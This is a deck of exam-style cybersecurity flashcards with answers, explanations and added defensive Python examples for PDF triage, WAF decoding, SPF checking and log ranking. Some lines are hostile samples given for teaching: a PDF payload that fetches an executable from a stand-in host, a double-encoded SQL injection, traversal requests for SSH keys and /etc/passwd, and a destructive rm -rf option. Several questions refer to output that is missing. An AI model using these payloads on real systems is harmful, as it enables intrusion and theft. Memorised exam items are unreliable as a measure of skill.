Part 4 Flashcards

1
Q

An organization developed a comprehensive incident response policy. Executive management approved the policy and its associated procedures. Which of the following activities would be MOST beneficial to evaluate personnel’s familiarity with incident response procedures?

A. A simulated breach scenario involving the incident response team

B. Completion of annual information security awareness training by all employees

C. Tabletop activities involving business continuity team members

D. Completion of lessons-learned documentation by the computer security incident response team

E. External and internal penetration testing by a third party

A

A. A simulated breach scenario involving the incident response team

2
Q

A security technician is testing a solution that will prevent outside entities from spoofing the company’s email domain, which is comptiA.org. The testing is successful, and the security technician is prepared to fully implement the solution. Which of the following actions should the technician take to accomplish this task?

A. Add TXT @ “v=spf1 mx include:_spf.comptiA.org all” to the DNS record.

B. Add TXT @ “v=spf1 mx include:_spf.comptiA.org all” to the email server.

C. Add TXT @ “v=spf1 mx include:_spf.comptiA.org +all” to the domain controller.

D. Add TXT @ “v=spf1 mx include:_spf.comptiA.org +all” to the web server.

A

A. Add TXT @ “v=spf1 mx include:_spf.comptiA.org all” to the DNS record.

SPF is published as a TXT record in the sending domain’s DNS zone; receiving mail servers look it up there, so adding it to the mail server, domain controller or web server does nothing. Note that a bare all carries the default + qualifier and therefore passes every sender, so a record that is meant to stop spoofing must end in -all (or ~all while testing).

3
Q

An organization needs to limit its exposure to accidental disclosure when employees send emails that contain personal information to recipients outside the company. Which of the following technical controls would BEST accomplish this goal?

A. DLP

B. Encryption

C. Data masking

D. SPF

A

A. DLP

4
Q

A security analyst received a SIEM alert regarding high levels of memory consumption for a critical system. After several attempts to remediate the issue, the system went down. A root cause analysis revealed a bad actor forced the application to not reclaim memory. This caused the system to be depleted of resources. Which of the following BEST describes this attack?

A. Injection attack

B. Memory corruption

C. Denial of service

D. Array attack

A

C. Denial of service

Forcing the application to leak memory until the host runs out of resources is a resource-exhaustion denial of service. Memory corruption would mean the contents of memory were altered (for example by an overflow), not that allocated memory was never freed.

5
Q

A security analyst working in the SOC recently discovered instances in which hosts visited a specific set of domains and IPs and became infected with malware. Which of the following is the MOST appropriate action to take in the situation?

A. Implement an IPS signature for the malware and update the blacklisting for the associated domains and IPs

B. Implement an IPS signature for the malware and another signature request to block all the associated domains and IPs

C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains

D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the IPs and domains

A

D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the IPs and domains

Blocking the domains and IPs at the firewall cuts off the known delivery and command-and-control paths, and the IPS signature catches the same malware if it arrives from infrastructure that is not yet on the block list. Option C does only the first half.

6
Q

Which of the following BEST articulates the benefit of leveraging SCAP in an organization’s cybersecurity analysis toolset?

A. It automatically performs remedial configuration changes to enterprise security services

B. It enables standard checklist and vulnerability analysis expressions for automation

C. It establishes a continuous integration environment for software development operations

D. It provides validation of suspected system vulnerabilities through workflow orchestration

A

B. It enables standard checklist and vulnerability analysis expressions for automation

7
Q

A Chief Security Officer (CSO) is working on the communication requirements for an organization’s incident response plan. In addition to technical response activities, which of the following is the main reason why communication must be addressed in an effective incident response program?

A. Public relations must receive information promptly in order to notify the community.

B. Improper communications can create unnecessary complexity and delay response actions.

C. Organizational personnel must only interact with trusted members of the law enforcement community.

D. Senior leadership should act as the only voice for the incident response team when working with forensics teams.

A

B. Improper communications can create unnecessary complexity and delay response actions.

8
Q

An employee in the billing department accidentally sent a spreadsheet containing payment card data to a recipient outside the organization. The employee intended to send the spreadsheet to an internal staff member with a similar name and was unaware of the mistake until the recipient replied to the message. In addition to retraining the employee, which of the following would prevent this from happening in the future?

A. Implement outgoing filter rules to quarantine messages that contain card data

B. Configure the outgoing mail filter to allow attachments only to addresses on the whitelist

C. Remove all external recipients from the employee’s address book

D. Set the outgoing mail filter to strip spreadsheet attachments from all messages.

A

A. Implement outgoing filter rules to quarantine messages that contain card data

An outbound filter that inspects content for card numbers (a DLP rule) stops the data regardless of who the recipient is. Allowing attachments only to whitelisted addresses (B) blocks legitimate external mail and still lets card data leave in the message body; removing address-book entries or stripping every spreadsheet does not address the data itself.

9
Q

An analyst wants to identify hosts that are connecting to the external FTP servers and what, if any, passwords are being used. Which of the following commands should the analyst use?

A. tcpdump -X dst port 21

B. ftp ftp.server -p 21

C. nmap -o ftp.server -p 21

D. telnet ftp.server 21

A

A. tcpdump -X dst port 21

Only a packet capture shows which internal hosts are connecting and what they send. The FTP control channel is cleartext, so with -X (hex and ASCII payload dump) the USER and PASS commands are readable in the capture; the other options connect to one server rather than observe traffic.

10
Q

An information security analyst observes anomalous behavior on the SCADA devices in a power plant. This behavior results in the industrial generators overheating and destabilizing the power supply. Which of the following would BEST identify potential indicators of compromise?

A. Use Burp Suite to capture packets to the SCADA device’s IP.

B. Use tcpdump to capture packets from the SCADA device IP.

C. Use Wireshark to capture packets between SCADA devices and the management system.

D. Use Nmap to capture packets from the management system to the SCADA devices.

A

C. Use Wireshark to capture packets between SCADA devices and the management system.

11
Q

A security analyst is investigating a system compromise. The analyst verifies the system was up to date on OS patches at the time of the compromise. Which of the following describes the type of vulnerability that was MOST likely exploited?

A. Insider threat

B. Buffer overflow

C. Advanced persistent threat

D. Zero day

A

D. Zero day

12
Q

A SIEM solution alerts a security analyst of a high number of login attempts against the company’s webmail portal. The analyst determines the login attempts used credentials from a past data breach. Which of the following is the BEST mitigation to prevent unauthorized access?

A. Single sign-on

B. Mandatory access control

C. Multifactor authentication

D. Federation

E. Privileged access management

A

C. Multifactor authentication

Credentials reused from an earlier breach are being replayed (credential stuffing); a second factor stops a valid password alone from granting access. Privileged access management governs administrative accounts and does not protect ordinary webmail logins.

13
Q

A hybrid control is one that:

A. is implemented differently on individual systems

B. is implemented at the enterprise and system levels

C. has operational and technical components

D. authenticates using passwords and hardware tokens

A

B. is implemented at the enterprise and system levels

14
Q

A bad actor bypasses authentication and reveals all records in a database through an SQL injection. Implementation of which of the following would work BEST to prevent similar attacks in

A. Strict input validation

B. Blacklisting

C. SQL patching

D. Content filtering

E. Output encoding

A

A. Strict input validation

15
Q

An organization is moving its infrastructure to the cloud in an effort to meet the budget and reduce staffing requirements. The organization has three environments: development, testing, and production. These environments have interdependencies but must remain relatively segmented. Which of the following methods would BEST secure the company’s infrastructure and be the simplest to manage and maintain?

A. Create three separate cloud accounts for each environment. Configure account peering and security rules to allow access to and from each environment.

B. Create one cloud account with one VPC for all environments. Purchase a virtual firewall and create granular security rules.

C. Create one cloud account and three separate VPCs for each environment. Create security rules to allow access to and from each environment.

D. Create three separate cloud accounts for each environment and a single core account for network services. Route all traffic through the core account.

A

C. Create one cloud account and three separate VPCs for each environment. Create security rules to allow access to and from each environment.

16
Q

An organization developed a comprehensive incident response policy. Executive management approved the policy and its associated procedures. Which of the following activities would be MOST beneficial to evaluate personnel’s familiarity with incident response procedures?

A. A simulated breach scenario involving the incident response team

B. Completion of annual information security awareness training by all employees

C. Tabletop activities involving business continuity team members

D. Completion of lessons-learned documentation by the computer security incident response team

E. External and internal penetration testing by a third party

A

A. A simulated breach scenario involving the incident response team

17
Q

Data spillage occurred when an employee accidentally emailed a sensitive file to an external recipient. Which of the following controls would have MOST likely prevented this incident?

A. SSO

B. DLP

C. WAF

D. VDI

A

B. DLP

18
Q

Which of the following will allow different cloud instances to share various types of data with a minimal amount of complexity?

A. Reverse engineering

B. Application log collectors

C. Workflow orchestration

D. API integration

E. Scripting

A

D. API integration

19
Q

A monthly job to install approved vendor software updates and hot fixes recently stopped working. The security team performed a vulnerability scan, which identified several hosts as having some critical OS vulnerabilities, as referenced in the common vulnerabilities and exposures (CVE) database. Which of the following should the security team do NEXT to resolve the critical findings in the most effective manner? (Choose two.)

A. Patch the required hosts with the correct updates and hot fixes, and rescan them for vulnerabilities.

B. Remove the servers reported to have high and medium vulnerabilities.

C. Tag the computers with critical findings as a business risk acceptance.

D. Manually patch the computers on the network, as recommended on the CVE website.

E. Harden the hosts on the network, as recommended by the NIST framework.

F. Resolve the monthly job issues and test them before applying them to the production network.

A

A. Patch the required hosts with the correct updates and hot fixes, and rescan them for vulnerabilities.

F. Resolve the monthly job issues and test them before applying them to the production network.

The findings exist because the patch job broke; fixing and testing the job keeps the gap from reopening, and patching plus a rescan closes the current findings. Removing servers or tagging critical findings as accepted business risk does not resolve them.

20
Q

Which of the following should be found within an organization’s acceptable use policy?

A. Passwords must be eight characters in length and contain at least one special character.

B. Customer data must be handled properly, stored on company servers, and encrypted when possible

C. Administrator accounts must be audited monthly, and inactive accounts should be removed.

D. Consequences of violating the policy could include discipline up to and including termination.

A

D. Consequences of violating the policy could include discipline up to and including termination.

21
Q

A Chief Information Security Officer (CISO) is concerned developers have too much visibility into customer data. Which of the following controls should be implemented to BEST address these concerns?

A. Data masking

B. Data loss prevention

C. Data minimization

D. Data sovereignty

A

A. Data masking

22
Q

An analyst is working with a network engineer to resolve a vulnerability that was found in a piece of legacy hardware, which is critical to the operation of the organization’s production line. The legacy hardware does not have third-party support, and the OEM manufacturer of the controller is no longer in operation. The analyst documents the activities and verifies these actions prevent remote exploitation of the vulnerability. Which of the following would be the MOST appropriate to remediate the controller?

A. Segment the network to constrain access to administrative interfaces.

B. Replace the equipment that has third-party support.

C. Remove the legacy hardware from the network.

D. Install an IDS on the network between the switch and the legacy equipment.

A

A. Segment the network to constrain access to administrative interfaces.

23
Q

A security analyst is investigating an incident that appears to have started with SOL injection against a publicly available web application. Which of the following is the FIRST step the analyst should take to prevent future attacks?

A. Modify the IDS rules to have a signature for SQL injection.

B. Take the server offline to prevent continued SQL injection attacks.

C. Create a WAF rule In block mode for SQL injection

D. Ask the developers to implement parameterized SQL queries.

A

C. Create a WAF rule in block mode for SQL injection

A blocking WAF rule is the control the analyst can put in front of the application immediately; an IDS signature (A) only alerts and prevents nothing. Parameterized queries (D) are the permanent fix and should follow, but they depend on a development change and a release cycle.

24
Q

A large amount of confidential data was leaked during a recent security breach. As part of a forensic investigation, the security team needs to identify the various types of traffic that were captured between two compromised devices. Which of the following should be used to identify the traffic?

A. Carving

B. Disk imaging

C. Packet analysis

D. Memory dump

E. Hashing

A

C. Packet analysis

25
Q

An incident responder successfully acquired application binaries off a mobile device for later forensic analysis. Which of the following should the analyst do NEXT?

A. Decompile each binary to derive the source code.

B. Perform a factory reset on the affected mobile device.

C. Compute SHA-256 hashes for each binary.

D. Encrypt the binaries using an authenticated AES-256 mode of operation.

E. Inspect the permissions manifests within each application.

A

C. Compute SHA-256 hashes for each binary.

26
Q

Joe, a penetration tester, used a professional directory to identify a network administrator and ID administrator for a client’s company. Joe then emailed the network administrator, identifying himself as the ID administrator, and asked for a current password as part of a security exercise. Which of the following techniques were used in this scenario?

A. Enumeration and OS fingerprinting

B. Email harvesting and host scanning

C. Social media profiling and phishing

D. Network and host scanning

A

C. Social media profiling and phishing

27
Q

Which of the following is the use of tools to simulate the ability for an attacker to gain access to a specified network?

A. Reverse engineering

B. Fuzzing

C. Penetration testing

D. Network mapping

A

C. Penetration testing

28
Q

A small electronics company decides to use a contractor to assist with the development of a new FPGA-based device. Several of the development phases will occur off-site at the contractor’s labs. Which of the following is the main concern a security analyst should have with this arrangement?

A. Making multiple trips between development sites increases the chance of physical damage to the FPGAs.

B. Moving the FPGAs between development sites will lessen the time that is available for security testing.

C. Development phases occurring at multiple sites may produce change management issues.

D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft.

A

D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft.

29
Q

A security analyst is trying to determine if a host is active on a network. The analyst first attempts the following: The analyst runs the following command next: Which of the following would explain the difference in results?

A. ICMP is being blocked by a firewall.

B. The routing tables for ping and hping3 were different.

C. The original ping command needed root permission to execute.

D. hping3 is returning a false positive.

A

A. ICMP is being blocked by a firewall.

30
Q

A cybersecurity analyst is contributing to a team hunt on an organization’s endpoints. Which of the following should the analyst do FIRST?

A. Write detection logic.

B. Establish a hypothesis.

C. Profile the threat actors and activities.

D. Perform a process analysis.

A

B. Establish a hypothesis.

31
Q

An information security analyst is compiling data from a recent penetration test and reviews the following output: The analyst wants to obtain more information about the web-based services that are running on the target. Which of the following commands would MOST likely provide the needed information?

A. ping -t 10.79.95.173.rdns.datacenters.com

B. telnet 10.79.95.173 443

C. ftpd 10.79.95.173.rdns.datacenters.com 443

D. tracert 10.79.95.173

A

B. telnet 10.79.95.173 443

32
Q

A security analyst has received reports of very slow, intermittent access to a public-facing corporate server. Suspecting the system may be compromised, the analyst runs the following commands: Based on the output from the above commands, which of the following should the analyst do NEXT to further the investigation?

A. Run crontab -r; rm -rf /tmp/.t to remove and disable the malware on the system.

B. Examine the server logs for further indicators of compromise of a web application.

C. Run kill -9 1325 to bring the load average down so the server is usable again.

D. Perform a binary analysis on the /tmp/.t/t file, as it is likely to be a rogue SSHD server

A

B. Examine the server logs for further indicators of compromise of a web application.

33
Q

While planning segmentation for an ICS environment, a security engineer determines IT resources will need access to devices within the ICS environment without compromising security. To provide the MOST secure access model in this scenario, the jumpbox should be __________.

A. placed in an isolated network segment, authenticated on the IT side, and forwarded into the ICS network.

B. placed on the ICS network with a static firewall rule that allows IT network resources to authenticate.

C. bridged between the IT and operational technology networks to allow authenticated access.

D. placed on the IT side of the network, authenticated, and tunneled into the ICS environment.

A

A. placed in an isolated network segment, authenticated on the IT side, and forwarded into the ICS network.

34
Q

A security analyst is reviewing the logs from an internal chat server. The chat.log file is too large to review manually, so the analyst wants to create a shorter log file that only includes lines associated with a user demonstrating anomalous activity. Which of the following commands would work BEST to achieve the desired result?

A. grep -v chatter14 chat.log

B. grep -i pythonfun chat.log

C. grep -i javashark chat.log

D. grep -v javashark chat.log

E. grep -v pythonfun chat.log

F. grep -i chatter14 chat.log

A

D. grep -v javashark chat.log

35
Q

A security analyst is evaluating two vulnerability management tools for possible use in an organization. The analyst set up each of the tools according to the respective vendor’s instructions and generated a report of vulnerabilities that ran against the same target server. Tool A reported the following: Which of the following BEST describes the method used by each tool? (Choose two.)

A. Tool A is agent based.

B. Tool A used fuzzing logic to test vulnerabilities.

C. Tool A is unauthenticated.

D. Tool B utilized machine learning technology.

E. Tool B is agent based.

F. Tool B is unauthenticated.

A

A. Tool A is agent based. F. Tool B is unauthenticated.

36
Q

A user receives a potentially malicious email that contains spelling errors and a PDF document. A security analyst reviews the email and decides to download the attachment to a Linux sandbox for review. Which of the following commands would MOST likely indicate if the email is malicious?

A. sha256sum ~/Desktop/file.pdf

B. file ~/Desktop/file.pdf

C. strings ~/Desktop/file.pdf | grep “

A

C. strings ~/Desktop/file.pdf | grep “

A hash (A) only tells you whether the file is already known to a reputation service, and file (B) only confirms it is a PDF. Pulling the printable strings and searching them for active-content keywords such as /JavaScript, /OpenAction or /Launch shows directly whether the document carries the kind of payload a malicious PDF relies on.
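The strings-and-grep check from card 36, in a form that can be run on a file: an added example, not part of the deck. It hashes the file, checks the header, and counts the PDF name objects that introduce active content, after undoing the #xx name escaping that hides /JavaScript from a naive string match. The two PDF byte strings are constructed for the example and are not real samples.

```python
"""PDF triage: what `strings file.pdf | grep` looks for, done properly.

Added example for card 36; not part of the flashcard deck. The two PDF
byte strings are constructed for the example (the suspicious one carries
a hypothetical launchURL payload) and are not real samples."""
import hashlib
import re

# PDF name objects that introduce active or hidden content. Counting them is
# the same heuristic pdfid-style tools use; a non-zero count is a reason to
# detonate the file in a sandbox, not proof of malice.
RISKY_NAMES = (
    "/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
    "/EmbeddedFile", "/RichMedia", "/URI",
)
NAME_RE = re.compile(rb"/[A-Za-z0-9#]+")


def _unescape_name(name: bytes) -> bytes:
    # The PDF spec allows #xx hex escapes inside names, so /JavaScript can
    # be written /J#61vaScript; a plain grep for "JavaScript" misses that.
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), name)


def triage_pdf(data: bytes) -> dict:
    """Return the file hash, whether it has a PDF header, and risky-name counts."""
    counts = {}
    for match in NAME_RE.finditer(data):
        name = _unescape_name(match.group(0)).decode("latin-1")
        if name in RISKY_NAMES:
            counts[name] = counts.get(name, 0) + 1
    return {
        "sha256": hashlib.sha256(data).hexdigest(),  # useful for reputation lookups only
        "is_pdf": data.startswith(b"%PDF-"),
        "indicators": counts,
    }


# Constructed sample: a catalog whose OpenAction runs obfuscated JavaScript.
SUSPICIOUS_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /J#61vaScript /JS (app.launchURL('http://example.invalid/x.exe')) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
# Constructed sample: the same skeleton with no actions at all.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(label, triage_pdf(blob))
```

Run it on a real attachment with `triage_pdf(open(path, "rb").read())`. Streams compressed with /FlateDecode will hide names from this scan just as they hide them from strings; decompressing them is the next step, and is what dedicated PDF parsers do.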

37
Q

While analyzing logs from a WAF, a cybersecurity analyst finds the following: “GET /form.php?id=463225%2b%2575%256e%2569%256f%256e%2b%2573%2574%2box3133333731,1223,1224&name=&state=IL” Which of the following BEST describes what the analyst has found?

A. This is an encrypted GET HTTP request

B. A packet is being used to bypass the WAF

C. This is an encrypted packet

D. This is an encoded WAF bypass

A

D. This is an encoded WAF bypass

Nothing here is encrypted; the %25 sequences are percent signs that were themselves percent-encoded, so a filter that decodes once sees %75%6e%69%6f%6e while the application, decoding again, sees union. Double encoding is a standard way to slip SQL injection past a WAF that inspects only the first decoding layer.
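To see why card 37 is a bypass rather than encryption, here is an added example (not from the deck) that decodes the quoted request layer by layer and reports what appears and how many layers it took. The request line is the one in the card as it appears on the page; the benign request and the keyword list are constructed for the example.

```python
"""Peel percent-encoding layers off query parameters and flag what emerges.

Added example for card 37; not part of the flashcard deck. The first
request line is the card's; the benign request and the SQL keyword list
are constructed for the example."""
import re
from urllib.parse import unquote_plus, urlsplit

SQLI_KEYWORDS = re.compile(
    r"\b(union|select|insert|update|delete|drop|sleep|benchmark|information_schema)\b"
    r"|\b(or|and)\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def deep_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing.

    Returns (decoded, rounds). rounds > 1 means the value was encoded more
    than once, which is itself an evasion indicator: browsers never do that."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_request(request_line):
    """Split a 'GET /path?query' line and report suspicious parameters."""
    _method, _, target = request_line.partition(" ")
    query = urlsplit(target).query
    findings = []
    # Split by hand rather than with parse_qs, which would decode once for us
    # and hide how many layers were there.
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, raw = pair.partition("=")
        decoded, rounds = deep_decode(raw)
        keywords = sorted({m.group(0).lower() for m in SQLI_KEYWORDS.finditer(decoded)})
        if keywords or rounds > 1:
            findings.append({"param": key, "decoded": decoded,
                             "rounds": rounds, "keywords": keywords})
    return findings


CARD_REQUEST = ("GET /form.php?id=463225%2b%2575%256e%2569%256f%256e%2b%2573%2574"
                "%2box3133333731,1223,1224&name=&state=IL")
BENIGN_REQUEST = "GET /form.php?id=463225&name=&state=IL"  # constructed

if __name__ == "__main__":
    for line in (CARD_REQUEST, BENIGN_REQUEST):
        print(line)
        for f in inspect_request(line):
            print("  ", f)
```

After two decoding rounds the id parameter reads `463225 union st ox3133333731,1223,1224` (the payload is cut short in the card, but the union is unambiguous). A WAF that normalises to a fixed point before matching, as `deep_decode` does, is not fooled by the extra layer; one that decodes exactly once is.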

38
Q

A company’s marketing emails are either being found in a spam folder or not being delivered at all. The security analyst investigates the issue and discovers the emails in question are being sent on behalf of the company by a third party, mail.marketing.com. Below is the existing SPF record: v=spf1 a mx -all Which of the following updates to the SPF record will work BEST to prevent the emails from being marked as spam or blocked?

A. v=spf1 a mx redirect:mail.marketing.com ?all

B. v=spf1 a mx include:mail.marketing.com -all

C. v=spf1 a mx +all

D. v=spf1 a mx include:mail.marketing.com ~all

A

D. v=spf1 a mx include:mail.marketing.com ~all

include: pulls in the third party’s authorized senders, which is what the existing record lacks. ~all (softfail) is the conservative choice while the new sender is being validated, because a host the include misses is marked rather than rejected outright; -all (B) would also work but rejects anything not yet listed, +all (C) authorizes the whole Internet, and redirect is a modifier written with =, not a mechanism written with : (A).
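An added example, not part of the deck, that evaluates the records in cards 2 and 38 the way a receiving mail server would (RFC 7208 check_host), against an in-memory DNS table instead of live lookups. All names and addresses in the table are constructed for the example: the comptia.org record is the one from card 2 as written, and example.com stands in for the company domain in card 38.

```python
"""Minimal SPF evaluator (RFC 7208 check_host) over an in-memory DNS table.

Added example for cards 2 and 38; not part of the flashcard deck. Supports
the a, mx, ip4, include and all mechanisms with all four qualifiers. The
DNS data is constructed for the example (RFC 5737 test addresses); no
network lookups are made, and redirect=/exp= modifiers are skipped."""
import ipaddress

# A matching mechanism yields the result of its qualifier. The default
# qualifier is "+", so the bare "all" in card 2 is "+all": every sender
# passes and the record stops nothing. That is why card 38 ends with ~all.
QUALIFIER_RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_INCLUDE_DEPTH = 10  # loose stand-in for the RFC's DNS-lookup limit

DNS = {  # constructed zone data
    "txt": {
        "comptia.org": "v=spf1 mx include:_spf.comptiA.org all",       # card 2, as written
        "_spf.comptia.org": "v=spf1 ip4:203.0.113.0/24 -all",
        "example.com": "v=spf1 a mx include:mail.marketing.com ~all",  # card 38, option D
        "mail.marketing.com": "v=spf1 ip4:198.51.100.0/24 -all",
    },
    "a": {"example.com": ["192.0.2.10"], "mx.example.com": ["192.0.2.26"],
          "mx1.comptia.org": ["192.0.2.25"]},
    "mx": {"comptia.org": ["mx1.comptia.org"], "example.com": ["mx.example.com"]},
}


def _addrs(dns, name):
    return {ipaddress.ip_address(a) for a in dns["a"].get(name.lower(), [])}


def check_host(ip, domain, dns=DNS, depth=0):
    """Result of evaluating `domain`'s SPF record for a connection from `ip`."""
    if depth > MAX_INCLUDE_DEPTH:
        return "permerror"
    addr = ipaddress.ip_address(ip)
    domain = domain.lower()
    terms = (dns["txt"].get(domain) or "").split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    for term in terms[1:]:
        if "=" in term:  # modifier such as redirect= or exp=: not implemented here
            continue
        qualifier = "+"
        if term[0] in QUALIFIER_RESULT:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            matched = True
        elif name == "ip4":
            matched = addr in ipaddress.ip_network(arg, strict=False)
        elif name == "a":
            matched = addr in _addrs(dns, arg or domain)
        elif name == "mx":
            matched = any(addr in _addrs(dns, mx) for mx in dns["mx"].get(arg or domain, []))
        elif name == "include":
            # include matches only if the referenced record passes; its fail or
            # softfail just means "no match here" and evaluation continues.
            sub = check_host(ip, arg, dns, depth + 1)
            if sub in ("none", "permerror"):
                return "permerror"
            matched = sub == "pass"
        else:
            return "permerror"  # ip6, ptr and exists are not implemented
        if matched:
            return QUALIFIER_RESULT[qualifier]
    return "neutral"  # nothing matched


if __name__ == "__main__":
    for ip, dom in [("198.51.100.25", "example.com"), ("203.0.113.99", "example.com"),
                    ("192.0.2.200", "comptia.org")]:
        print(f"{ip:>15} sending as {dom:<12} -> {check_host(ip, dom)}")
```

The third case is the point of the caveat on card 2: 192.0.2.200 is in none of comptia.org’s mechanisms, yet the record returns pass because the trailing all has no qualifier. Change that record to end in -all and the same sender fails.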

39
Q

After a breach involving the exfiltration of a large amount of sensitive data, a security analyst is reviewing the following firewall logs to determine how the breach occurred: Which of the following IP addresses does the analyst need to investigate further?

A. 192.168.1.1

B. 192.168.1.10

C. 192.168.1.12

D. 192.168.1.193

A

B. 192.168.1.10

40
Q

During an incident, a cybersecurity analyst found several entries in the web server logs that are related to an IP with a bad reputation. Which of the following would cause the analyst to further review the incident?

A. BadReputationIp - - [2019-04-12 10:43Z] "GET /etc/passwd" 403 1023

B. BadReputationIp - - [2019-04-12 10:43Z] "GET /index.html?src=../.ssh/id_rsa" 401 17044

C. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=/etc/passwd" 403 11056

D. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=../../.ssh/id_rsa" 200 15036

E. BadReputationIp - - [2019-04-12 10:43Z] "GET /favicon.ico?src=../usr/share/icons" 200 19064

A

D. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=../../.ssh/id_rsa" 200 15036

The other traversal attempts were refused (401 or 403). This one was answered with 200 and a 15 KB body, so the src parameter of a.php most likely read a private SSH key off the server; the favicon request (E) also returned 200 but asked for an icon directory rather than a credential.
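An added example (not from the deck) that ranks the five log lines quoted in card 40 by how much each one suggests a successful attack: a traversal sequence or a sensitive file in the request is suspicious, and a 2xx status on such a request is what makes it urgent. The log lines are the card’s; the scoring weights are constructed for the example.

```python
"""Rank web-server log lines from a bad-reputation IP by attack evidence.

Added example for card 40; not part of the flashcard deck. The five log
lines are the ones the card quotes; the scoring weights are constructed
for the example."""
import re

LOG_RE = re.compile(
    r'^(?P<src>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)" (?P<status>\d{3}) (?P<size>\d+)$'
)

# Files an attacker reaches for once a traversal or file-include bug is found.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", ".ssh/id_rsa", ".ssh/authorized_keys")

SAMPLE_LOG = [  # the five entries from card 40
    'BadReputationIp - - [2019-04-12 10:43Z] "GET /etc/passwd" 403 1023',
    'BadReputationIp - - [2019-04-12 10:43Z] "GET /index.html?src=../.ssh/id_rsa" 401 17044',
    'BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=/etc/passwd" 403 11056',
    'BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=../../.ssh/id_rsa" 200 15036',
    'BadReputationIp - - [2019-04-12 10:43Z] "GET /favicon.ico?src=../usr/share/icons" 200 19064',
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in this format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = int(entry["size"])
    return entry


def score(entry):
    """Attack evidence: what was asked for, and whether the server answered."""
    target = entry["target"]
    reasons = []
    points = 0
    if "../" in target or "..%2f" in target.lower():
        points += 1
        reasons.append("traversal sequence")
    if any(p in target for p in SENSITIVE_PATHS):
        points += 2
        reasons.append("sensitive file")
    # 401/403 means the server refused. A 2xx on a suspicious request means the
    # attacker probably got the bytes (compare the response size), so weight it up.
    if points and 200 <= entry["status"] < 300:
        points *= 3
        reasons.append("request succeeded")
    return points, reasons


def triage(lines):
    """Parse, score and sort log lines, most suspicious first (ties keep log order)."""
    ranked = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        entry["score"], entry["reasons"] = score(entry)
        ranked.append(entry)
    ranked.sort(key=lambda e: e["score"], reverse=True)
    return ranked


if __name__ == "__main__":
    for e in triage(SAMPLE_LOG):
        print(e["score"], e["status"], e["size"], e["target"], e["reasons"])
```

The successful id_rsa read ranks first by a wide margin; the refused attempts are still worth recording, since they show the attacker’s intent and which inputs the application rejected, but the 200 is the one to act on.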

41
Q

Which of the following should the analyst investigate FIRST?

A. Port 21

B. Port 22

C. Port 23

D. Port 80

A

C. Port 23

42
Q

An organization was alerted to a possible compromise after its proprietary data was found for sale on the Internet. An analyst is reviewing the logs from the next- generation UTM in an attempt to find evidence of this breach. Given the following output: Which of the following should be the focus of the investigation?

A. webserver.org-dmz.org

B. sftp.org-dmz.org

C. 83hht23.org-int.org

D. ftps.bluemed.net

A

A. webserver.org-dmz.org

43
Q

A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output: Which of the following commands should the administrator run NEXT to further analyze the compromised system?

A. strace /proc/1301

B. rpm -V openssh-server

C. /bin/ls -l /proc/1301/exe

D. kill -9 1301

A

C. /bin/ls -l /proc/1301/exe

The exe symlink under /proc/<pid> shows which binary the suspicious process was started from, and whether that file has since been deleted; invoking ls by its absolute path sidesteps a hijacked PATH. strace attaches with -p <pid>, not a /proc path; rpm -V verifies packaged files but says nothing about a process running from elsewhere; and killing the process destroys the evidence before it has been examined.

44
Q

A security analyst scanned an internal company subnet and discovered a host with the following Nmap output. Based on the output of this Nmap scan, which of the following should the analyst investigate FIRST?

A. Port 22

B. Port 135

C. Port 445

D. Port 3389

A

B. Port 135

45
Q

Which of the following actions will an attacker be able to initiate directly against this host?

A. Password sniffing

B. ARP spoofing

C. A brute-force attack

D. An SQL injection

A

C. A brute-force attack

46
Q

A security analyst needs to assess the web server versions on a list of hosts to determine which are running a vulnerable version of the software and output that list into an XML file named webserverlist.xml. The host list is provided in a file named webserverlist.txt. Which of the following Nmap commands would BEST accomplish this goal?

A. nmap -iL webserverlist.txt -sC -p 443 -oX webserverlist.xml

B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml

C. nmap -iL webserverlist.txt -F -p 443 -oX webserverlist.xml

D. nmap --takefile webserverlist.txt --outputfileasXML webserverlist.xml --scanports 443

A

B. nmap -iL webserverlist.txt -sV -p 443 -oX webserverlist.xml

47
Q

Which of the following session management techniques will help to prevent a session identifier from being stolen via an XSS attack?

A. Ensuring the session identifier length is sufficient

B. Creating proper session identifier entropy

